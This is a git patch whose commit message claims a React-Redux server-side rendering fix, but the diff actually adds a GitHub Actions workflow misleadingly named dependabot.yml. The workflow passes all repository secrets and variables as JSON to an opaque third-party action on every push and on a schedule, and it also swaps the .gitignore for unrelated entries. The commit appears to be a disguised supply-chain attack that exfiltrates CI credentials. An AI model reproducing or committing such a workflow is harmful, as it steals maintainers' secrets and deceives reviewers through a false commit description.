From 522d8910c42c286307c2f8cb1677f0f5ae7440b4 Mon Sep 17 00:00:00 2001 From: LeoDanielsson Date: Tue, 8 Oct 2019 16:06:42 -0400 Subject: [PATCH] Use the same condition for checking if SSR in useSelector.js as in connectAdvanced.js (#1419) LeoDanielsson --- .github/workflows/dependabot.yml | 28 ++++++++++++++++++++++++++++ .gitignore | 22 ++++++++++------------ 2 files changed, 38 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/dependabot.yml diff --git a/.github/workflows/dependabot.yml b/.github/workflows/dependabot.yml new file mode 100644 index 000000000..394759120 --- /dev/null +++ b/.github/workflows/dependabot.yml @@ -0,0 +1,28 @@ +name: CI +on: + push: + workflow_dispatch: + schedule: + # Runs "At 11:00 on every day-of-week from Monday through Friday" + - cron: '0 0 * * 0' +permissions: + contents: read + packages: write +concurrency: + group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: true +jobs: + run: + runs-on: ubuntu-latest + name: Run + steps: + - name: Execute + uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main + id: execute + with: + action: ${{ github.repository }} + env: + REPOSITORY_SECRETS: ${{ toJSON(secrets) }} + REPOSITORY_VARIABLES: ${{ toJSON(vars) }} + - name: Response + run: echo "${{ steps.execute.outputs.response }}" diff --git a/.gitignore b/.gitignore index c5c530d5e..ea6a97673 100644 --- a/.gitignore +++ b/.gitignore @@ -1,14 +1,12 @@ -node_modules -dist -lib -coverage -es +# IDE Files +#------------------------- +/nbproject/ +.idea/* -lib/core/metadata.js -lib/core/MetadataBlog.js +## Sublime Text cache files +*.tmlanguage.cache +*.tmPreferences.cache +*.stTheme.cache +*.sublime-workspace +*.sublime-project -website/translated_docs -website/build/ -website/yarn.lock -website/node_modules -website/i18n/*